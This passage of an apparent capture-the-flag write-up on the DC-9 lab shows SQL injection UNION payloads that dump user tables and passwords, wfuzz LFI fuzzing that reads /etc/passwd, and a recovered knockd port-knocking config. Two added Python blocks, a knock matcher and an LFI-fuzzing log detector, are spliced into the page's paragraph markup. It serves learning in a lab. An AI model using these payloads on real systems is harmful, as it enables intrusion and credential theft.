tom' <span class="token keyword">union</span> <span class="token keyword">SELECT</span> <span class="token number">1</span><span class="token punctuation">,</span>group_concat<span class="token punctuation">(</span>table_schema<span class="token punctuation">,</span><span class="token string">":"</span><span class="token punctuation">,</span>table_name<span class="token punctuation">,</span><span class="token string">"<br/>"</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span><span class="token punctuation">,</span><span class="token number">6</span> <span class="token keyword">FROM</span> information_schema<span class="token punctuation">.</span><span class="token keyword">tables</span> <span class="token comment">-- -</span>
<span class="token punctuation">(</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">)</span>
<span class="token punctuation">,</span>information_schema:TRIGGERS
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>information_schema:USER_PRIVILEGES</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span>information_schema:VIEWS
<span class="token punctuation">(</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">)</span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>Staff:StaffDetails</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>Staff:Users</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>users:UserDetails</span></mark></span></span></code></pre><pre id="https://www.notion.so/cf8ea66d7fe0442da4ff4329704dbcf0" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">5</span> <span class="token operator">-</span> Listing all columns of the tables we care about
tom<span class="token string">' union SELECT 1,group_concat(table_schema,":",table_name,"->",column_name,"<br/>"),3,4,5,6 FROM information_schema.columns WHERE table_name = '</span>Users<span class="token string">' or table_name = '</span>UserDetails' <span class="token operator">or</span> table_name <span class="token operator">=</span> <span class="token string">"USER_PRIVILEGES"</span> <span class="token comment">-- - </span>
ID: <span class="token number">1</span>
Name: information_schema:USER_PRIVILEGES<span class="token operator">-</span><span class="token operator">></span>GRANTEE
<span class="token punctuation">,</span>information_schema:USER_PRIVILEGES<span class="token operator">-</span><span class="token operator">></span>TABLE_CATALOG
<span class="token punctuation">,</span>information_schema:USER_PRIVILEGES<span class="token operator">-</span><span class="token operator">></span>PRIVILEGE_TYPE
<span class="token punctuation">,</span>information_schema:USER_PRIVILEGES<span class="token operator">-</span><span class="token operator">></span>IS_GRANTABLE
<span class="token punctuation">,</span>Staff:Users<span class="token operator">-</span><span class="token operator">></span>UserID
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>Staff:Users<span class="token operator">-</span><span class="token operator">></span>Username</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>Staff:Users<span class="token operator">-</span><span class="token operator">></span>Password</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>id
<span class="token punctuation">,</span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>firstname
<span class="token punctuation">,</span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>lastname
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>username</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span></span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>password</span></mark></span><span class="SemanticString"><span>
<span class="token punctuation">,</span>users:UserDetails<span class="token operator">-</span><span class="token operator">></span>reg_date
<span class="token number">3</span>
Position: <span class="token number">4</span>
Phone <span class="token keyword">No</span>: <span class="token number">5</span>
Email: <span class="token number">6</span></span></span></span></code></pre><pre id="https://www.notion.so/907acbaaf48c40369cc1bfe47d31d546" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">6</span> <span class="token operator">-</span> Checking the contents of table Staff<span class="token punctuation">.</span>Users
tom<span class="token string">' union select 1,group_concat(Username,'</span><span class="token operator">=</span><span class="token string">',Password,'</span><span class="token operator"><</span>br<span class="token operator">/</span><span class="token operator">></span>'<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span><span class="token punctuation">,</span><span class="token number">6</span> <span class="token keyword">from</span> Staff<span class="token punctuation">.</span>Users<span class="token comment">-- - </span>
ID: <span class="token number">1</span>
Name: </span></span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><span>admin<span class="token operator">=</span><span class="token number">856</span>f5de590ef37314e7c3bdf6f8a66dc</span></mark></strong></span><span class="SemanticString"><span>
<span class="token number">3</span>
Position: <span class="token number">4</span>
Phone <span class="token keyword">No</span>: <span class="token number">5</span>
Email: <span class="token number">6</span></span></span></span></code></pre><div id="https://www.notion.so/d15f2aad92d649ac99b27a4f9e7960be" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We get an Admin credential whose password looks like a hash. Looking it up on </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://crackstation.net">crackstation.net</a></span><span class="SemanticString"> gives us</span></span></p></div><div id="https://www.notion.so/0f950e132ba54f56a23ffac843e10a26" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1746e99d-bc04-43c8-965d-4c6639543836%2FUntitled.png?width=2034&table=block&id=0f950e13-2ba5-4f56-a23f-fac843e10a26"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1746e99d-bc04-43c8-965d-4c6639543836%2FUntitled.png?width=2034&table=block&id=0f950e13-2ba5-4f56-a23f-fac843e10a26" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><pre id="https://www.notion.so/65d30f37d64f47588b31caa3d67cdd23" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">7</span> <span class="token operator">-</span> Checking the contents of table users<span class="token punctuation">.</span>UserDetails
tom<span class="token string">' union select 1,group_concat(Username,'</span><span class="token operator">=</span><span class="token string">',Password,'</span><span class="token operator"><</span>br<span class="token operator">/</span><span class="token operator">></span>'<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">,</span><span class="token number">5</span><span class="token punctuation">,</span><span class="token number">6</span> <span class="token keyword">from</span> users<span class="token punctuation">.</span>UserDetails<span class="token comment">-- - </span>
ID: <span class="token number">1</span>
Name:
</span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><span>marym<span class="token operator">=</span><span class="token number">3</span>kfs86sfd
<span class="token punctuation">,</span>julied<span class="token operator">=</span><span class="token number">468</span>sfdfsd2
<span class="token punctuation">,</span>fredf<span class="token operator">=</span><span class="token number">4</span>sfd87sfd1
<span class="token punctuation">,</span>barneyr<span class="token operator">=</span>RocksOff
<span class="token punctuation">,</span>tomc<span class="token operator">=</span>TC<span class="token operator">&</span>TheBoyz
<span class="token punctuation">,</span>jerrym<span class="token operator">=</span>B8m<span class="token comment">#48sd</span>
<span class="token punctuation">,</span>wilmaf<span class="token operator">=</span>Pebbles
<span class="token punctuation">,</span>bettyr<span class="token operator">=</span>BamBam01
<span class="token punctuation">,</span>chandlerb<span class="token operator">=</span>UrAG0D<span class="token operator">!</span>
<span class="token punctuation">,</span>joeyt<span class="token operator">=</span>Passw0rd
<span class="token punctuation">,</span>rachelg<span class="token operator">=</span>yN72<span class="token comment">#dsd</span>
<span class="token punctuation">,</span>rossg<span class="token operator">=</span>ILoveRachel
<span class="token punctuation">,</span>monicag<span class="token operator">=</span><span class="token number">3248</span>dsds7s
<span class="token punctuation">,</span>phoebeb<span class="token operator">=</span>smellycats
<span class="token punctuation">,</span>scoots<span class="token operator">=</span>YR3BVxxxw87
<span class="token punctuation">,</span>janitor<span class="token operator">=</span>Ilovepeepee
<span class="token punctuation">,</span>janitor2<span class="token operator">=</span>Hawaii<span class="token operator">-</span>Five<span class="token operator">-</span><span class="token number">0</span></span></strong></mark></span><span class="SemanticString"><span>
<span class="token number">3</span>
Position: <span class="token number">4</span>
Phone <span class="token keyword">No</span>: <span class="token number">5</span>
Email: <span class="token number">6</span></span></span></span></code></pre><div id="https://www.notion.so/008b3b60331048799722073c47fef8c6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">More credentials.</span></span></p></div><div id="https://www.notion.so/7b163c4a26714bf2ae4a5a3f0774d6ee" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">To cut a long story short: with the admin credential, the manage menu gives full access to the Add Record option, which lets us write to the database. The application is also vulnerable to XSS, but we do not use that for anything.</span></span></p></div><div id="https://www.notion.so/06e6ad7cb26b432687e423383345b201" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">At this point we are still puzzled by a possible LFI and by this pile of credentials, which suggests they are there so that we can get into that blocked port 22! Having read about port knocking a while back, I wondered whether that was what this was. In some challenges I have seen the attacker somehow get hold of a pcap, and traffic analysis then reveals the sequence of ports to hit.</span></span></p></div><div id="https://www.notion.so/a723a9e2a9dd469689b6f5b64337ebbe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">So let's fuzz to discover which parameter would give us the LFI. For that we will use WFUZZ.
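The port-knocking idea raised above, as an added example that is neither part of this writeup nor knockd's own code: a simplified model of how a knockd-style daemon matches a knock sequence, using the rules from the knockd.conf recovered later in the writeup (openSSH = 7469,8475,9842, closeSSH = the reverse, seq_timeout = 25, SYN-only as with tcpflags = syn). The reset-on-wrong-port rule, the event tuples, the IPs and the timings are assumptions.

```python
"""Simplified model of how a knockd-style daemon matches a knock sequence.

Added example, not knockd's own code and not part of the writeup. The rules mirror the
knockd.conf recovered later in the writeup (openSSH = 7469,8475,9842; closeSSH = the
reverse; seq_timeout = 25; tcpflags = syn), so the input is a list of observed SYNs as
(timestamp_seconds, source_ip, destination_port). The behaviour on a wrong port is an
assumption of this model, as are the IPs and timings in EVENTS.
"""
from dataclasses import dataclass


@dataclass
class KnockRule:
    name: str
    sequence: tuple       # ports that must be hit in this exact order
    seq_timeout: float    # seconds allowed between the first and the last knock


@dataclass
class Progress:
    index: int = 0        # how many ports of the sequence have matched so far
    started: float = 0.0  # timestamp of the first matched knock


class KnockMatcher:
    """Per (source IP, rule) state: knockd opens port 22 only for the knocking host (-s %IP%)."""

    def __init__(self, rules):
        self.rules = list(rules)
        self.state = {}  # (src_ip, rule_name) -> Progress

    def feed(self, ts, src_ip, dport):
        """Consume one SYN; return the names of the rules this packet completed."""
        completed = []
        for rule in self.rules:
            key = (src_ip, rule.name)
            prog = self.state.get(key, Progress())
            # The whole sequence must arrive within seq_timeout of the first knock.
            if prog.index > 0 and ts - prog.started > rule.seq_timeout:
                prog = Progress()
            if dport == rule.sequence[prog.index]:
                if prog.index == 0:
                    prog.started = ts
                prog.index += 1
                if prog.index == len(rule.sequence):
                    completed.append(rule.name)
                    prog = Progress()
            else:
                # Wrong port: abandon the attempt (assumption: the packet may still
                # count as the first knock of a fresh attempt for this rule).
                prog = Progress(index=1, started=ts) if dport == rule.sequence[0] else Progress()
            self.state[key] = prog
        return completed


DC9_RULES = [
    KnockRule("openSSH", (7469, 8475, 9842), 25),
    KnockRule("closeSSH", (9842, 8475, 7469), 25),
]


def simulate(events, rules=DC9_RULES):
    """Run SYN events (ts, src_ip, dport) through the matcher; return (ts, src_ip, rule) completions."""
    matcher = KnockMatcher(rules)
    hits = []
    for ts, src_ip, dport in events:
        for name in matcher.feed(ts, src_ip, dport):
            hits.append((ts, src_ip, name))
    return hits


# Constructed SYN events (not captured from the lab):
EVENTS = [
    (0.0, "192.168.1.5", 7469),    # correct order, 1 s apart like knock -d1000
    (1.0, "192.168.1.5", 8475),
    (2.0, "192.168.1.5", 9842),    # -> openSSH completes, for 192.168.1.5 only
    (10.0, "192.168.1.7", 7469),   # a scanner touching the same ports out of order
    (11.0, "192.168.1.7", 9842),
    (12.0, "192.168.1.7", 8475),   # -> nothing opens
    (40.0, "192.168.1.5", 9842),   # reverse order -> closeSSH
    (41.0, "192.168.1.5", 8475),
    (42.0, "192.168.1.5", 7469),
    (100.0, "192.168.1.9", 7469),  # right order but 30 s end to end > seq_timeout
    (110.0, "192.168.1.9", 8475),
    (130.0, "192.168.1.9", 9842),  # -> nothing opens
]

if __name__ == "__main__":
    for ts, ip, rule in simulate(EVENTS):
        print(f"t={ts:6.1f}s  {ip:<14} {rule}")
```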
</span></span></p></div><div id="https://www.notion.so/64d51d704c614dc8824c754cb1773da6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Since we saw that the LFI only shows up when logged in, we need to log in to the application with the admin credential we obtained, or open welcome.php directly, so that the application issues an authentication cookie. We will hand that cookie to WFUZZ so it can make its requests as an authenticated user.</span></span></p></div><div id="https://www.notion.so/4a551a147af64d578040fcc97f1c5b4f" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F26c04e74-4c37-49ce-9eac-e6051ba01ccd%2FUntitled.png?width=511&table=block&id=4a551a14-7af6-4d57-8040-fcc97f1c5b4f"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F26c04e74-4c37-49ce-9eac-e6051ba01ccd%2FUntitled.png?width=511&table=block&id=4a551a14-7af6-4d57-8040-fcc97f1c5b4f" style="width:511px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">not authenticated: no message in the footer</span></span></figcaption></figure></div><div id="https://www.notion.so/ae120ac9138d4569926aa641dc968d99" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fbe95a057-50fa-4bcc-8cec-2946da495d8e%2FUntitled.png?width=602&table=block&id=ae120ac9-138d-4569-926a-a641dc968d99"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fbe95a057-50fa-4bcc-8cec-2946da495d8e%2FUntitled.png?width=602&table=block&id=ae120ac9-138d-4569-926a-a641dc968d99" style="width:602px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">authenticated: message in the footer</span></span></figcaption></figure></div><div id="https://www.notion.so/d4d21b559a9d4deebeca19aa8d290aa5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">To grab the cookie, once authenticated, we use the Firefox extension: </span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">cookie quick manager</strong></span></span></p></div><div id="https://www.notion.so/28af7a84e3704a11a6721784d260bc33" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff745d6e0-4083-48b8-8f5d-887621184b04%2FUntitled.png?width=1152&table=block&id=28af7a84-e370-4a11-a672-1784d260bc33"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff745d6e0-4083-48b8-8f5d-887621184b04%2FUntitled.png?width=1152&table=block&id=28af7a84-e370-4a11-a672-1784d260bc33" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/34d2f248fa7f4334bb306f16f465079d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After clicking Search Cookies for </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://example.com">example.com</a></span><span class="SemanticString">, a new tab opens with the cookie. Just copy it!</span></span></p></div><div id="https://www.notion.so/7ef885e6afd546258d43b34a6eab81db" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fac8b60d6-b702-4ad3-adf6-9fe71776b5aa%2FUntitled.png?width=465&table=block&id=7ef885e6-afd5-4625-8d43-b34a6eab81db"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fac8b60d6-b702-4ad3-adf6-9fe71776b5aa%2FUntitled.png?width=465&table=block&id=7ef885e6-afd5-4625-8d43-b34a6eab81db" style="width:465px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/cf76076394844b0f97955e07fc975ed8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Time to run WFUZZ with a wordlist of the most common parameter names</span></span></p></div><div id="https://www.notion.so/9a90ead654674d6ab10ffaef5f2109fc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"> 
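The server-side view of a run like the one that follows, as an added example that is not part of this writeup: a detector over constructed access-log lines that groups requests carrying a ../ traversal payload by client and path, treats many distinct parameter names sent with one payload as parameter fuzzing, and turns the writeup's grep -v "1341 Ch" trick around to single out the parameter whose response size broke away from the baseline. The combined log format, the IPs, the timestamps and the 2917-byte size are assumptions.

```python
"""Detect parameter-name fuzzing with a traversal payload in web server access logs.

Added example, not part of the writeup. Assumptions: combined log format (the Apache/nginx
default); the sample lines, IPs, timestamps and the 2917-byte response size below are
constructed. The 1341-byte baseline and the ../../etc/passwd payload are the ones seen in
the wfuzz run.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Traversal payloads: repeated ../ or ..\ plus the usual absolute targets.
TRAVERSAL_RE = re.compile(r"(?:\.\./|\.\.\\){2,}|/etc/passwd|/proc/self/environ", re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    # parse_qsl strips one layer of percent-encoding; unquote again so a
    # double-encoded payload (%252e%252e%252f) still matches.
    rec["params"] = [(k, unquote(v)) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def find_lfi_fuzzing(lines, min_names=10):
    """Group traversal requests by (client, path, payload).

    A burst in which many distinct parameter names carry the same payload is parameter
    fuzzing. Inside a burst, the response size that almost every request gets is the
    'nothing happened' page; a parameter whose response size differs is one the
    application actually used, i.e. the probable successful LFI. Returns a list of findings.
    """
    bursts = defaultdict(list)  # (ip, path, payload) -> [(param_name, size)]
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            if TRAVERSAL_RE.search(value):
                bursts[(rec["ip"], rec["path"], value)].append((name, rec["size"]))

    findings = []
    for (ip, path, payload), hits in bursts.items():
        names = {n for n, _ in hits}
        if len(names) < min_names:
            continue
        baseline = Counter(s for _, s in hits).most_common(1)[0][0]
        suspects = sorted({n for n, s in hits if s != baseline})
        findings.append({
            "ip": ip, "path": path, "payload": payload,
            "requests": len(hits), "distinct_params": len(names),
            "baseline_size": baseline, "suspect_params": suspects,
        })
    return findings


SAMPLE_PAYLOAD = "../../../../../../../../../../../../etc/passwd"
PARAM_NAMES = ["id", "page", "q", "name", "user", "path", "dir", "view", "include",
               "template", "lang", "cat", "doc", "url", "src", "file"]


def constructed_log():
    """Constructed access-log lines modelled on the wfuzz run: every candidate parameter
    name gets the 1341-byte page except 'file', which returns a larger one."""
    lines = []
    for i, name in enumerate(PARAM_NAMES):
        size = 2917 if name == "file" else 1341
        lines.append(f'192.168.1.5 - - [10/Jul/2020:17:01:{i:02d} -0400] '
                     f'"GET /manage.php?{name}={SAMPLE_PAYLOAD} HTTP/1.1" 200 {size} "-" "-"')
    # Ordinary traffic that must not be flagged.
    lines.append('192.168.1.6 - - [10/Jul/2020:17:02:00 -0400] '
                 '"GET /manage.php?id=12 HTTP/1.1" 200 1341 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for f in find_lfi_fuzzing(constructed_log()):
        print(f"{f['ip']} fuzzed {f['distinct_params']} parameter names on {f['path']}; "
              f"baseline {f['baseline_size']} bytes; suspect parameter(s): {f['suspect_params']}")
```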
</span></span></p></div><pre id="https://www.notion.so/7ce20ebe75f846828ede353f6ca760f1" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>wfuzz <span class="token operator">-</span>c <span class="token operator">-</span>z <span class="token keyword">file</span><span class="token punctuation">,</span><span class="token operator">/</span>usr<span class="token operator">/</span><span class="token keyword">share</span><span class="token operator">/</span>seclists<span class="token operator">/</span>Discovery<span class="token operator">/</span>Web<span class="token operator">-</span>Content<span class="token operator">/</span>burp<span class="token operator">-</span>parameter<span class="token operator">-</span>names<span class="token punctuation">.</span>txt <span class="token operator">-</span>b <span class="token string">"PHPSESSID=te7118tl328rqgpqu0t37vrdi3"</span> <span class="token operator">-</span>u http:<span class="token comment">//192.168.1.9/manage.php?FUZZ=../../../../../../../../../../../../etc/passwd</span></span></span></span></code></pre><div id="https://www.notion.so/e611153792be4e2db709ff43c31f6fb8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/77e706a3865a4258bb03f705d152e17c" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdc99dc5a-c9c9-4912-839b-fc93ef528772%2FUntitled.png?width=1294&table=block&id=77e706a3-865a-4258-bb03-f705d152e17c"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdc99dc5a-c9c9-4912-839b-fc93ef528772%2FUntitled.png?width=1294&table=block&id=77e706a3-865a-4258-bb03-f705d152e17c" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div 
id="https://www.notion.so/b923e01bb2be4414bc817476298bc653" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Wfuzz requests the given URL, replacing the word FUZZ with each name from the list. As expected, every attempt where the LFI does not work produces the same response, in this case, as the image above shows, one of 1341 characters. Rather than scrolling through the output looking for a change in behaviour, we pipe it through grep to show only the lines that differ from 1341 Ch.</span></span></p></div><pre id="https://www.notion.so/6fc85ccdf3a94a8a84af19dec500e667" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>wfuzz <span class="token operator">-</span>c <span class="token operator">-</span>z <span class="token keyword">file</span><span class="token punctuation">,</span><span class="token operator">/</span>usr<span class="token operator">/</span><span class="token keyword">share</span><span class="token operator">/</span>seclists<span class="token operator">/</span>Discovery<span class="token operator">/</span>Web<span class="token operator">-</span>Content<span class="token operator">/</span>burp<span class="token operator">-</span>parameter<span class="token operator">-</span>names<span class="token punctuation">.</span>txt <span class="token operator">-</span>b <span class="token string">"PHPSESSID=te7118tl328rqgpqu0t37vrdi3"</span> <span class="token operator">-</span>u http:<span class="token comment">//192.168.1.9/manage.php?FUZZ=../../../../../../../../../../../../etc/passwd | grep -v "1341 Ch"</span></span></span></span></code></pre><div id="https://www.notion.so/79296f23f7ce4db4a9577b18407153a3" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdef2e904-6ffa-4b08-aa53-a90edd3766fd%2FUntitled.png?width=1297&table=block&id=79296f23-f7ce-4db4-a957-7b18407153a3"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdef2e904-6ffa-4b08-aa53-a90edd3766fd%2FUntitled.png?width=1297&table=block&id=79296f23-f7ce-4db4-a957-7b18407153a3" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/657957fde0834e0cac4a69cef132d31c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Parameter found: file. </strong></span><span class="SemanticString"> Let's test it in the browser and see whether we get the response we expect.</span></span></p></div><div id="https://www.notion.so/59610020b9114b6f93a3e600190fe1c4" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F9336fc49-cfe6-496f-9e80-f2a846b5fce7%2FUntitled.png?width=984&table=block&id=59610020-b911-4b6f-93a3-e600190fe1c4"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F9336fc49-cfe6-496f-9e80-f2a846b5fce7%2FUntitled.png?width=984&table=block&id=59610020-b911-4b6f-93a3-e600190fe1c4" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/4f56d5db4702407780e34229835ed3ce" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We have the LFI. As we can see, /etc/passwd lists the users we enumerated earlier via SQLi, which reinforces the idea of SSH access; after all, a server with users but no way to log in would make no sense.</span></span></p></div><div id="https://www.notion.so/fd8635dd650f45aab9ab5a9b35c6bac3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">At this point, with help from a group of friends, one of them suggested checking whether there was a configuration file for a service called knockd, which is commonly used for port knocking. Let's test it.</span></span></p></div><div id="https://www.notion.so/1ea3aaf8637b43c48a603f46c7476cdc" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F6c875d6f-7369-4fa9-b69e-2d92260c9ccf%2FUntitled.png?width=989&table=block&id=1ea3aaf8-637b-43c4-8a60-3f46c7476cdc"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F6c875d6f-7369-4fa9-b69e-2d92260c9ccf%2FUntitled.png?width=989&table=block&id=1ea3aaf8-637b-43c4-8a60-3f46c7476cdc" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/90f3b3d37d714ba5be557409cb7c65b7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">There it is: configuration file found, along with the sequence of ports to be "knocked" on.</span></span></p></div><pre id="https://www.notion.so/c3027b341c264d0c89e49c1e3eb8a85e" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">[</span>openSSH<span class="token punctuation">]</span>
sequence <span class="token operator">=</span> <span class="token number">7469</span><span class="token punctuation">,</span><span class="token number">8475</span><span class="token punctuation">,</span><span class="token number">9842</span>
seq_timeout <span class="token operator">=</span> <span class="token number">25</span>
command <span class="token operator">=</span> <span class="token operator">/</span>sbin<span class="token operator">/</span>iptables <span class="token operator">-</span>I INPUT <span class="token operator">-</span>s <span class="token operator">%</span>IP<span class="token operator">%</span> <span class="token operator">-</span>p tcp <span class="token comment">--dport 22 -j ACCEPT</span>
tcpflags <span class="token operator">=</span> syn
<span class="token punctuation">[</span>closeSSH<span class="token punctuation">]</span>
sequence <span class="token operator">=</span> <span class="token number">9842</span><span class="token punctuation">,</span><span class="token number">8475</span><span class="token punctuation">,</span><span class="token number">7469</span>
seq_timeout <span class="token operator">=</span> <span class="token number">25</span>
